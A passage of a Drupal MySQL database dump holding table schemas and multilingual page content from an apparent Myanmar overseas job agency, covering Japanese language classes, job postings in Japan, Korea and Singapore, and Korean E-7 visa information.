('announcement', 0, 62, 407, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes.&nbsp;</p>', 'full_html'),
('announcement', 0, 62, 407, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', 'full_html'),
('announcement', 0, 62, 408, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes.&nbsp;</p>', 'full_html'),
('announcement', 0, 62, 408, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', 'full_html'),
('announcement', 0, 62, 409, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes.&nbsp;</p>', 'full_html'),
('announcement', 0, 62, 409, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', 'full_html'),
('announcement', 0, 155, 610, 'en', 0, '<p>Hotel Tokutei Preparation Class – New Intake Open</p>', 'full_html'),
('announcement', 0, 155, 611, 'en', 0, '<p>Hotel Tokutei Preparation Class – New Intake Open</p>', 'full_html'),
('announcement', 0, 155, 611, 'ja', 0, '<p>ホテル特定技能対策クラス 新規開講</p>', 'full_html'),
('announcement', 0, 162, 624, 'en', 0, '<p>Exciting career opportunity for JLPT N2 holders with a Tokutei Ginou Kaigo Certificate to work in Aichi Prefecture, Japan.</p>', 'full_html'),
('announcement', 0, 162, 625, 'en', 0, '<p>Exciting career opportunity for JLPT N2 holders with a Tokutei Ginou Kaigo Certificate to work in Aichi Prefecture, Japan.</p>', 'full_html'),
('announcement', 0, 162, 625, 'ja', 0, '<p>JLPT N2および特定技能（介護）資格保持者を対象とした愛知県での訪問介護求人です。</p>', 'full_html'),
('announcement', 0, 163, 626, 'en', 0, '<p>Employment opportunity in Tsukuba City, Ibaraki Prefecture for candidates with agricultural experience and JLPT N4 or above.</p>', 'full_html'),
('announcement', 0, 163, 627, 'en', 0, '<p>Employment opportunity in Tsukuba City, Ibaraki Prefecture for candidates with agricultural experience and JLPT N4 or above.</p>', 'full_html'),
('announcement', 0, 163, 627, 'ja', 0, '<p>農業経験があり、JLPT N4以上の方を対象とした茨城県つくば市での特定技能（農業）求人です。</p>', 'full_html');

-- --------------------------------------------------------

--
-- Table structure for table `node_revision__field_download_file`
--

CREATE TABLE `node_revision__field_download_file` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_download_file_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_download_file_display` tinyint UNSIGNED DEFAULT '1' COMMENT 'Flag to control whether this file should be displayed when viewing content.',
  `field_download_file_description` text COMMENT 'A description of the file.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Revision archive storage for node field field_download_file.';

-- --------------------------------------------------------

--
-- Table structure for table `node_revision__field_image`
--

CREATE TABLE `node_revision__field_image` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_image_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_image_alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image''s ''alt'' attribute.',
  `field_image_title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image''s ''title'' attribute.',
  `field_image_width` int UNSIGNED DEFAULT NULL COMMENT 'The width of the image in pixels.',
  `field_image_height` int UNSIGNED DEFAULT NULL COMMENT 'The height of the image in pixels.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Revision archive storage for node field field_image.';

-- --------------------------------------------------------

--
-- Table structure for table `node_revision__field_slider_img`
--

CREATE TABLE `node_revision__field_slider_img` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_slider_img_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_slider_img_alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image''s ''alt'' attribute.',
  `field_slider_img_title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image''s ''title'' attribute.',
  `field_slider_img_width` int UNSIGNED DEFAULT NULL COMMENT 'The width of the image in pixels.',
  `field_slider_img_height` int UNSIGNED DEFAULT NULL COMMENT 'The height of the image in pixels.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Revision archive storage for node field field_slider_img.';

--
-- Dumping data for table `node_revision__field_slider_img`
--

INSERT INTO `node_revision__field_slider_img` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `field_slider_img_target_id`, `field_slider_img_alt`, `field_slider_img_title`, `field_slider_img_width`, `field_slider_img_height`) VALUES
('slider', 0, 21, 91, 'en', 0, 37, '', '', 1250, 689),
('slider', 0, 22, 92, 'en', 0, 38, '', '', 1250, 689);

-- --------------------------------------------------------

--
-- Table structure for table `node_revision__field_tags`
--

CREATE TABLE `node_revision__field_tags` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_tags_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the target entity.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Revision archive storage for node field field_tags.';

-- --------------------------------------------------------

--
-- Table structure for table `node__body`
--

CREATE TABLE `node__body` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `body_value` longtext NOT NULL,
  `body_summary` longtext,
  `body_format` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for node field body.';

--
-- Dumping data for table `node__body`
--

INSERT INTO `node__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 206, 'en', 0, '<h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p>Thank you for visiting our website, \"NEW COMET TRADING AGENCY\"! We are delighted to have you here. Please feel free to explore our website and learn more about the services and opportunities we offer. If you have any questions or need assistance, don\'t hesitate to reach out to us. We are here to help you on your journey towards achieving your goals.</p><h3>&nbsp;</h3><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 1, 206, 'ja', 0, '<h3 style=\"-webkit-text-stroke-width:0px;background-color:rgb(244, 244, 244);box-sizing:border-box;color:rgb(52, 52, 52);font-family:pyidaungsu;font-size:1.7em;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;letter-spacing:normal;line-height:40px;margin:0px 0px 1rem;orphans:2;padding:0px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\"><strong>弊社ウェブサイト「NEW COMET TRADING AGENCY」へようこそ！</strong></h3><h3 style=\"-webkit-text-stroke-width:0px;background-color:rgb(244, 244, 244);box-sizing:border-box;color:rgb(52, 52, 52);font-family:pyidaungsu;font-size:1.7em;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;letter-spacing:normal;line-height:40px;margin:0px 0px 1rem;orphans:2;padding:0px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\"><strong><img src=\"/sites/default/files/inline-images/0-02-06-4f55b8ebb3b47b4a42250c8beee726bd7e8c58d2421acc8cb9e74564397af8ac_915ef54ff9aea418.jpg\" data-entity-uuid=\"11bdd5ab-02ab-46db-adb5-ee71d641622a\" data-entity-type=\"file\"></strong></h3><h6 style=\"-webkit-text-stroke-width:0px;background-color:rgb(244, 244, 244);box-sizing:border-box;color:rgb(52, 52, 52);font-family:pyidaungsu;font-size:1.7em;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;letter-spacing:normal;line-height:40px;margin:0px 0px 1rem;orphans:2;padding:0px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">当社のウェブサイト、「NEW COMET TRADING AGENCY」へようこそ！ご訪問いただき、大変嬉しく思っています。当ウェブサイトをお楽しみいただき、提供しているサービスや機会についてさらに詳しくご覧ください。何か質問やお手伝いがございましたら、お気軽にお問い合わせください。私たちは皆様の目標達成の旅をサポートするためにここにいます。<o:p></o:p><o:p></o:p></h6>', '', 'full_html'),
('page', 0, 1, 206, 'ko', 0, '<div class=\"flex flex-grow flex-col gap-3\"><div class=\"min-h-[20px] flex items-start overflow-x-auto whitespace-pre-wrap break-words flex-col gap-4\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><h3>\"NEW COMET TRADING AGENCY\" 웹사이트에 오신 것을 환영합니다!!!!&nbsp;</h3><img data-entity-uuid=\"7015f95e-7234-408a-a9ee-075b30f18bd4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-4f55b8ebb3b47b4a42250c8beee726bd7e8c58d2421acc8cb9e74564397af8ac_915ef54ff9aea418_0.jpg\"><p>\"NEW COMET TRADING AGENCY\" 웹사이트 방문에 감사드립니다! 저희가 여러분을 여기에 맞이할 수 있어 기쁩니다. 자유롭게 웹사이트를 탐색하시고 제공하는 서비스와 기회에 대해 더 자세히 알아보세요. 질문이나 도움이 필요하신 경우 언제든지 저희에게 연락해주십시오. 여러분의 목표 달성을 위한 여정에서 도움을 드리기 위해 준비되어 있습니다.</p><p>저희 해외 취업 대행사는 현재 한국, 일본, 말레이시아 등에서 다양한 채용 정보를 소개하고 있습니다.</p></div></div></div>', '', 'full_html'),
('announcement', 0, 3, 213, 'en', 0, '<h3>Who should attend E 7-3 Welding Class?</h3><p>First thing want to tell is Financial Problem.</p><p>You should invest around 150-200 Lakhs at least 6 months to one year.</p><p>After arriving to Korea, Myanmar Kyats &nbsp;200 Lakhs would be no problem cause you can receive Bank Loan if you have a ID card in Korea.</p><p>Second thing is you must be the one who is willing to learn the welding technology. Language is important although you don\'t have to take the Exam. It will be better to know vocabularies related to jobs, culture and tradition of Korea. ( It will not be strange for those who went to Korea with E-9 visa.)<br>&nbsp;</p><p><strong>For the last thing, as E 7-3 is&nbsp;</strong></p><p>Welding technician, even though you have to change workplaces, you must &nbsp;be in welding field. In the past, &nbsp;you only had one month to find jobs after quitting the current job for workers with &nbsp;E 7-4 visa. There were some E 7-4 visa holders who came back to their home country because they couldn\'t get job within the given time. So, you need to pay attention and know the rules for overseas workers regulated by South Korea. If you don\'t understand in Korean Language, it is important to know in Burmese.<br>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 3, 213, 'ja', 0, '<h3>E 7-3 溶接クラスには誰が参加すべきですか?<br>&nbsp;</h3><p>最初にお伝えしたいのは、財政的な問題です。</p><p>韓国に到着後、約150-200ラクス（1ラクス＝約1万円）を少なくとも6ヶ月から1年の間に投資する必要があります。</p><p>韓国に在住する間、ミャンマー・チャット200ラクスを手に入れることは問題ありません。なぜなら、韓国でIDカードを持っていれば銀行ローンを受けることができるからです。</p><p>次に、溶接技術を学びたいという意欲が必要です。言語は重要ですが、試験を受ける必要はありません。ただし、職業や韓国の文化・伝統に関連する語彙を知っていると良いでしょう。（E-9ビザで韓国に渡った人々にとっても不思議ではないでしょう。）</p><p><strong>最後に、E 7-3ビザについてお伝えします。</strong></p><p>E 7-3ビザは溶接技術者のためのものであり、職場を変える場合でも、引き続き溶接の分野で働く必要があります。過去には、E 7-4ビザ保持者の労働者は、現在の職を辞めてから1か月以内に新しい職を見つける必要がありました。しかし、その期間内に仕事を見つけられなかったE 7-4ビザ保持者が、母国に戻るケースもありました。そのため、韓国が規定する海外労働者に対するルールを理解することが重要です。もし韓国語で理解できない場合は、ビルマ語で理解することが大切です。<br>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 3, 213, 'ko', 0, '<h3>Who should attend E 7-3 Welding Class?</h3><p>First thing want to tell is Financial Problem.</p><p>You should invest around 150-200 Lakhs at least 6 months to one year.</p><p>After arriving to Korea, Myanmar Kyats &nbsp;200 Lakhs would be no problem cause you can receive Bank Loan if you have a ID card in Korea.</p><p>Second thing is you must be the one who is willing to learn the welding technology. Language is important although you don\'t have to take the Exam. It will be better to know vocabularies related to jobs, culture and tradition of Korea. ( It will not be strange for those who went to Korea with E-9 visa.)<br>&nbsp;</p><p><strong>For the last thing, as E 7-3 is&nbsp;</strong></p><p>Welding technician, even though you have to change workplaces, you must &nbsp;be in welding field. In the past, &nbsp;you only had one month to find jobs after quitting the current job for workers with &nbsp;E 7-4 visa. There were some E 7-4 visa holders who came back to their home country because they couldn\'t get job within the given time. So, you need to pay attention and know the rules for overseas workers regulated by South Korea. If you don\'t understand in Korean Language, it is important to know in Burmese.<br>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 4, 210, 'en', 0, '<h3>Wanted Desperately</h3><p>Korean Language Teacher (Female/Male) 1 position who meets the following qualifications is needed in Yangon.</p><ul><li>Those who live near Sinmalike Shipyard situated on Bayint Naung Road or who can come and teach in that place.</li><li>Must have at least TOPIK Level 3 Certificate</li><li>Must have at least 1 year teaching experience as Korean Language Teacher</li><li>Can teach at least 2 sections per day; in the morning and afternoon.</li></ul><h3><br>Contact Us<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 210, 'ja', 0, '<h3>Wanted Desperately</h3><p>Korean Language Teacher (Female/Male) 1 position who meets the following qualifications is needed in Yangon.</p><ul><li>Those who live near Sinmalike Shipyard situated on Bayint Naung Road or who can come and teach in that place.</li><li>Must have at least TOPIK Level 3 Certificate</li><li>Must have at least 1 year teaching experience as Korean Language Teacher</li><li>Can teach at least 2 sections per day; in the morning and afternoon.</li></ul><h3><br>Contact Us<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 210, 'ko', 0, '<h3>Contact Us<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 5, 359, 'en', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 359, 'ja', 0, '<p>パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています。</p><p><br>勤務時間 -<br>午前8時から午後5時まで（1日8時間）<br>給与: 1日あたり20シンガポールドル<br>5時以降に残業が必要な場合、残業手当は通常の給与の1.5倍となります.<br>食事は自己管理で行っていただく必要があります。<br>寮の生活費は支払う必要はありません。<br>オフィス/会社は交通手段としてフェリーをサポートしています。<br>年齢が20歳から35歳の健康でアクティブな方々を募集しています。<br>学歴の要件はありません。<br>英語を少し話し、理解できるだけで十分です。</p><p>Contact Us</p><p>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)<br>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 359, 'ko', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 6, 214, 'en', 0, '<img src=\"/sites/default/files/inline-images/E7-3_visa_korea.jpg\" data-align=\"center\" data-entity-uuid=\"e857287c-31d2-45cd-8d5c-c00dbf296637\" data-entity-type=\"file\"><p>In order to get employed to the shipyard in Korea with an E7-3 Visa, the trainees are explained what is needed to quickly come and check the welding exam.</p>', '', 'full_html'),
('activities', 0, 6, 214, 'ja', 0, '<img src=\"/sites/default/files/inline-images/E7-3_visa_korea.jpg\" data-align=\"center\" data-entity-uuid=\"e857287c-31d2-45cd-8d5c-c00dbf296637\" data-entity-type=\"file\"><p>E7-3ビザを持って韓国の造船所で雇用されるためには、研修生に対して迅速に来て溶接試験を受けるために必要な内容が説明されます。</p>', '', 'full_html'),
('activities', 0, 6, 214, 'ko', 0, '<img src=\"/sites/default/files/inline-images/E7-3_visa_korea.jpg\" data-align=\"center\" data-entity-uuid=\"e857287c-31d2-45cd-8d5c-c00dbf296637\" data-entity-type=\"file\"><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p>', '', 'full_html'),
('activities', 0, 7, 288, 'en', 0, '<p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 288, 'ja', 0, '<p>E-7ビザは外国人に対する特定能力を持つ方のための特別なビザであり、以下のカテゴリーに分けられています：</p><p>E-7-1ビザ（専門家）：特定の分野の管理職や専門家に対して与えられるビザです。</p><p>E-7-2ビザ（準専門職）：オフィスの仕事やサービス業に従事する方に対するビザです。</p><p>E-7-3ビザ（技術者）：技術分野で働く方に対するビザです。</p><p>E-7-4ビザ（経験豊富な技術者）：経験豊富な技術者向けのビザで、通常、5年以上の経験を持つ労働者はE-9から移行します。</p>', '', 'full_html'),
('activities', 0, 7, 288, 'ko', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 8, 215, 'en', 0, '<p>&nbsp;Overtime 3 hours a day and (22) days off, After deducting money to be earned and other living and dining expenses, health insurance and income tax expenses, there may be more than 50,000,000 MMK left.</p>', '', 'full_html'),
('activities', 0, 8, 215, 'ja', 0, '<p>&nbsp;1日3時間の残業と（22日）の休暇があり、収入から差し引かれるべき金額や生活費、食費、健康保険、所得税などの経費を差し引いた後、50,000,000 MMK以上が残る可能性があります。</p>', '', 'full_html'),
('activities', 0, 8, 215, 'ko', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 9, 187, 'en', 0, '<img src=\"/sites/default/files/inline-images/new_comet_activities.jpg\" data-align=\"center\" data-entity-uuid=\"4e0faeac-bf6f-4f01-b21b-65098313010c\" data-entity-type=\"file\"><p>The first batch of welding trainees from NEW COMET TRADING AGENCY CO.,LTD from Sinmalike Shipyard was met by the Deputy Minister of the Ministry of Transport and Communications and gave speeches and inspected the training school.</p>', '', 'full_html'),
('activities', 0, 9, 187, 'ja', 0, '<img src=\"/sites/default/files/inline-images/new_comet_activities.jpg\" data-align=\"center\" data-entity-uuid=\"4e0faeac-bf6f-4f01-b21b-65098313010c\" data-entity-type=\"file\"><p>ニューコメット商社株式会社のシンマライク造船所からの初めての溶接研修生たちが、運輸通信省の副大臣によって出迎えられ、スピーチを行い、訓練校を視察しました。</p>', '', 'full_html'),
('activities', 0, 9, 187, 'ko', 0, '<img src=\"/sites/default/files/inline-images/new_comet_activities.jpg\" data-align=\"center\" data-entity-uuid=\"4e0faeac-bf6f-4f01-b21b-65098313010c\" data-entity-type=\"file\"><p>ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေး ဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍ အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးသည်။</p>', '', 'full_html'),
('announcement', 0, 10, 358, 'en', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" 